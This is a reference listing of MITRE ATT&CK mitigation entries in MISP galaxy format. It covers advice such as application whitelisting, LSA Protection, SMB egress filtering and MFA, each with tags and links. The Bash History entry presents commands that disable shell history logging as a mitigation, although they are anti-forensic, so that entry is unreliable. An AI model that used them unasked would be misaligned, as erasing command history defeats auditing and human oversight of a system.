Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through [Input Capture](https://attack.mitre.org/techniques/T1056) and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Automated Collection Mitigation - T1119"

Automated Collection Mitigation - T1119 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 6641. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1119

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Template Injection Mitigation - T1221

Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations including training users to identify social engineering techniques and spearphishing emails. Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads. (Citation: Anomali Template Injection MAR 2018)

The tag is: misp-galaxy:mitre-course-of-action="Template Injection Mitigation - T1221"

Table 6642. Table References

Links

https://attack.mitre.org/mitigations/T1221

https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6

Audio Capture Mitigation - T1123

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Audio Capture Mitigation - T1123"

Audio Capture Mitigation - T1123 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 6643. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1123

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Encoding Mitigation - T1132

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Encoding Mitigation - T1132"

Data Encoding Mitigation - T1132 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 6644. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1132

Video Capture Mitigation - T1125

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to capture video and images by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Video Capture Mitigation - T1125"

Video Capture Mitigation - T1125 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

Table 6645. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1125

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Login Item Mitigation - T1162

Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).

The tag is: misp-galaxy:mitre-course-of-action="Login Item Mitigation - T1162"

Login Item Mitigation - T1162 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"

Table 6646. Table References

Links

https://attack.mitre.org/mitigations/T1162

https://support.apple.com/en-us/HT204005

Domain Fronting Mitigation - T1172

If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.

In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.

The tag is: misp-galaxy:mitre-course-of-action="Domain Fronting Mitigation - T1172"

Domain Fronting Mitigation - T1172 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"

Table 6647. Table References

Links

http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016

https://attack.mitre.org/mitigations/T1172

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

AppCert DLLs Mitigation - T1182

Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppCert DLLs Mitigation - T1182"

AppCert DLLs Mitigation - T1182 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182" with estimative-language:likelihood-probability="almost-certain"

Table 6648. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1182

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Other mitigations can take place as [User Execution](https://attack.mitre.org/techniques/T1204) occurs.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Link Mitigation - T1192"

Spearphishing Link Mitigation - T1192 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"

Table 6649. Table References

Links

https://attack.mitre.org/mitigations/T1192

Hidden Window Mitigation - T1143

Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Window Mitigation - T1143"

Hidden Window Mitigation - T1143 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143" with estimative-language:likelihood-probability="almost-certain"

Table 6650. Table References

Links

https://attack.mitre.org/mitigations/T1143

Create Account Mitigation - T1136

Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to create privileged accounts within an environment.

Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.

Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.

The tag is: misp-galaxy:mitre-course-of-action="Create Account Mitigation - T1136"

Create Account Mitigation - T1136 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

Table 6651. Table References

Links

https://attack.mitre.org/mitigations/T1136

Application Shimming Mitigation - T1138

There currently aren’t a lot of ways to mitigate application shimming. Disabling the Shim Engine isn’t recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.

Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.

The tag is: misp-galaxy:mitre-course-of-action="Application Shimming Mitigation - T1138"

Application Shimming Mitigation - T1138 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138" with estimative-language:likelihood-probability="almost-certain"

Table 6652. Table References

Links

https://attack.mitre.org/mitigations/T1138

Spearphishing Attachment Mitigation - T1193

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.

Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails. To prevent the attachments from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Attachment Mitigation - T1193"

Spearphishing Attachment Mitigation - T1193 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"

Table 6653. Table References

Links

https://attack.mitre.org/mitigations/T1193

Bash History Mitigation - T1139

There are multiple methods of preventing a user’s command history from being flushed to their .bash_history file, including use of the following commands: <code>set +o history</code> and <code>set -o history</code> to start logging again; <code>unset HISTFILE</code> being added to a user’s .bash_rc file; and <code>ln -s /dev/null ~/.bash_history</code> to write commands to <code>/dev/null</code>instead.

The tag is: misp-galaxy:mitre-course-of-action="Bash History Mitigation - T1139"

Bash History Mitigation - T1139 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Bash History - T1139" with estimative-language:likelihood-probability="almost-certain"

Table 6654. Table References

Links

https://attack.mitre.org/mitigations/T1139

Gatekeeper Bypass Mitigation - T1144

Other tools should be used to supplement Gatekeeper’s functionality. Additionally, system settings can prevent applications from running that haven’t been downloaded through the Apple Store which can help mitigate some of these issues.

The tag is: misp-galaxy:mitre-course-of-action="Gatekeeper Bypass Mitigation - T1144"

Gatekeeper Bypass Mitigation - T1144 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144" with estimative-language:likelihood-probability="almost-certain"

Table 6655. Table References

Links

https://attack.mitre.org/mitigations/T1144

Private Keys Mitigation - T1145

Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-course-of-action="Private Keys Mitigation - T1145"

Private Keys Mitigation - T1145 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"

Table 6656. Table References

Links

https://attack.mitre.org/mitigations/T1145

Hidden Users Mitigation - T1147

If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the <code>/Library/Preferences/com.apple.loginwindow</code> <code>Hide500Users</code> value will force all users to be visible.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Users Mitigation - T1147"

Hidden Users Mitigation - T1147 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147" with estimative-language:likelihood-probability="almost-certain"

Table 6657. Table References

Links

https://attack.mitre.org/mitigations/T1147

SSH Hijacking Mitigation - T1184

Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations where only the legitimate owner has access to with strong passwords and are rotated frequently. Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)

The tag is: misp-galaxy:mitre-course-of-action="SSH Hijacking Mitigation - T1184"

SSH Hijacking Mitigation - T1184 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"

Table 6658. Table References

Links

https://attack.mitre.org/mitigations/T1184

https://www.symantec.com/connect/articles/ssh-and-ssh-agent

LC_MAIN Hijacking Mitigation - T1149

Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.

The tag is: misp-galaxy:mitre-course-of-action="LC_MAIN Hijacking Mitigation - T1149"

LC_MAIN Hijacking Mitigation - T1149 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149" with estimative-language:likelihood-probability="almost-certain"

Table 6659. Table References

Links

https://attack.mitre.org/mitigations/T1149

Startup Items Mitigation - T1165

Since StartupItems are deprecated, preventing all users from writing to the <code>/Library/StartupItems</code> directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can’t be leveraged for privilege escalation.

The tag is: misp-galaxy:mitre-course-of-action="Startup Items Mitigation - T1165"

Startup Items Mitigation - T1165 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"

Table 6660. Table References

Links

https://attack.mitre.org/mitigations/T1165

Dylib Hijacking Mitigation - T1157

Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can’t write to these directories, then they can’t intercept the search path.

The tag is: misp-galaxy:mitre-course-of-action="Dylib Hijacking Mitigation - T1157"

Dylib Hijacking Mitigation - T1157 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"

Table 6661. Table References

Links

https://attack.mitre.org/mitigations/T1157

Launch Agent Mitigation - T1159

Restrict user’s abilities to create Launch Agents with group policy.

The tag is: misp-galaxy:mitre-course-of-action="Launch Agent Mitigation - T1159"

Launch Agent Mitigation - T1159 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159" with estimative-language:likelihood-probability="almost-certain"

Table 6662. Table References

Links

https://attack.mitre.org/mitigations/T1159

Browser Extensions Mitigation - T1176

Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.

Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)

Change settings to prevent the browser from installing extensions without sufficient permissions.

Close out all browser sessions when finished using them.

The tag is: misp-galaxy:mitre-course-of-action="Browser Extensions Mitigation - T1176"

Browser Extensions Mitigation - T1176 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 6663. Table References

Links

http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/

https://attack.mitre.org/mitigations/T1176

Process Doppelgänging Mitigation - T1186

This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although Process Doppelgänging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Doppelgänging Mitigation - T1186"

Process Doppelgänging Mitigation - T1186 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186" with estimative-language:likelihood-probability="almost-certain"

Table 6664. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1186

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

LSASS Driver Mitigation - T1177

On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code> to <code>dword:00000001</code>. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.

On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)

Ensure safe DLL search mode is enabled <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</code> to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)

The tag is: misp-galaxy:mitre-course-of-action="LSASS Driver Mitigation - T1177"

LSASS Driver Mitigation - T1177 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177" with estimative-language:likelihood-probability="almost-certain"

Table 6665. Table References

Links

https://attack.mitre.org/mitigations/T1177

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

https://technet.microsoft.com/library/dn408187.aspx

Forced Authentication Mitigation - T1187

Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)

For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.

The tag is: misp-galaxy:mitre-course-of-action="Forced Authentication Mitigation - T1187"

Forced Authentication Mitigation - T1187 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 6666. Table References

Links

https://attack.mitre.org/mitigations/T1187

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices

BITS Jobs Mitigation - T1197

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, disabling all BITS functionality will likely have unintended side effects, such as preventing legitimate software patching and updating. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: Mondok Windows PiggyBack BITS May 2007)

Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.

Consider limiting access to the BITS interface to specific users or groups. (Citation: Symantec BITS May 2007)

Consider reducing the default BITS job lifetime in Group Policy or by editing the <code>JobInactivityTimeout</code> and <code>MaxDownloadTime</code> Registry values in <code> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS</code>. (Citation: Microsoft BITS)

The tag is: misp-galaxy:mitre-course-of-action="BITS Jobs Mitigation - T1197"

BITS Jobs Mitigation - T1197 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 6667. Table References

Links

https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/

https://attack.mitre.org/mitigations/T1197

https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

https://www.symantec.com/connect/blogs/malware-update-windows-update

Trusted Relationship Mitigation - T1199

Network segmentation can be used to isolate infrastructure components that do not require broad network access. Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. Vet the security policies and procedures of organizations that are contracted for work that require privileged access to network resources.

The tag is: misp-galaxy:mitre-course-of-action="Trusted Relationship Mitigation - T1199"

Trusted Relationship Mitigation - T1199 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

Table 6668. Table References

Links

https://attack.mitre.org/mitigations/T1199

Firmware Corruption Mitigation - T1495

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.

The tag is: misp-galaxy:mitre-course-of-action="Firmware Corruption Mitigation - T1495"

Table 6669. Table References

Links

https://attack.mitre.org/mitigations/T1495

Resource Hijacking Mitigation - T1496

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Resource Hijacking Mitigation - T1496"

Table 6670. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1496

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Destruction Mitigation - T1488

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Destruction Mitigation - T1488"

Table 6671. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1488

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.ready.gov/business/implementation/IT

Service Stop Mitigation - T1489

Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.

The tag is: misp-galaxy:mitre-course-of-action="Service Stop Mitigation - T1489"

Table 6672. Table References

Links

https://attack.mitre.org/mitigations/T1489

Multi-factor Authentication - M1032

Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.

The tag is: misp-galaxy:mitre-course-of-action="Multi-factor Authentication - M1032"

Table 6673. Table References

Links

https://attack.mitre.org/mitigations/M1032

Rc.common Mitigation - T1163

Limit privileges of user accounts so only authorized users can edit the rc.common file.

The tag is: misp-galaxy:mitre-course-of-action="Rc.common Mitigation - T1163"

Rc.common Mitigation - T1163 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rc.common - T1163" with estimative-language:likelihood-probability="almost-certain"

Table 6674. Table References

Links

https://attack.mitre.org/mitigations/T1163

SSL/TLS Inspection - M1020

Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.

The tag is: misp-galaxy:mitre-course-of-action="SSL/TLS Inspection - M1020"

Table 6675. Table References

Links

https://attack.mitre.org/mitigations/M1020

Regsvcs/Regasm Mitigation - T1121

Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Regsvcs/Regasm Mitigation - T1121"

Regsvcs/Regasm Mitigation - T1121 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121" with estimative-language:likelihood-probability="almost-certain"

Table 6676. Table References

Links

https://attack.mitre.org/mitigations/T1121

Security Updates - M1001

Install security updates in response to discovered vulnerabilities.

Purchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.

Decommission devices that will no longer receive security updates.

Limit or block access to enterprise resources from devices that have not installed recent security updates.

On Android devices, access can be controlled based on each device’s security patch level. On iOS devices, access can be controlled based on the iOS version.

The tag is: misp-galaxy:mitre-course-of-action="Security Updates - M1001"

Security Updates - M1001 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Device Unlock Code Guessing or Brute Force - T1459" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"

Table 6677. Table References

Links

https://attack.mitre.org/mitigations/M1001

Lock Bootloader - M1003

On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.

The tag is: misp-galaxy:mitre-course-of-action="Lock Bootloader - M1003"

Lock Bootloader - M1003 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1458" with estimative-language:likelihood-probability="almost-certain"

Table 6678. Table References

Links

https://attack.mitre.org/mitigations/M1003

Network Segmentation - M1030

Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.

The tag is: misp-galaxy:mitre-course-of-action="Network Segmentation - M1030"

Table 6679. Table References

Links

https://attack.mitre.org/mitigations/M1030

Application Vetting - M1005

Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.

Enterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.

Application Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.

The tag is: misp-galaxy:mitre-course-of-action="Application Vetting - M1005"

Application Vetting - M1005 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

Table 6680. Table References

Links

https://attack.mitre.org/mitigations/M1005

Exploit Protection - M1050

Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Protection - M1050"

Table 6681. Table References

Links

https://attack.mitre.org/mitigations/M1050

User Guidance - M1011

Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.

The tag is: misp-galaxy:mitre-course-of-action="User Guidance - M1011"

User Guidance - M1011 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"

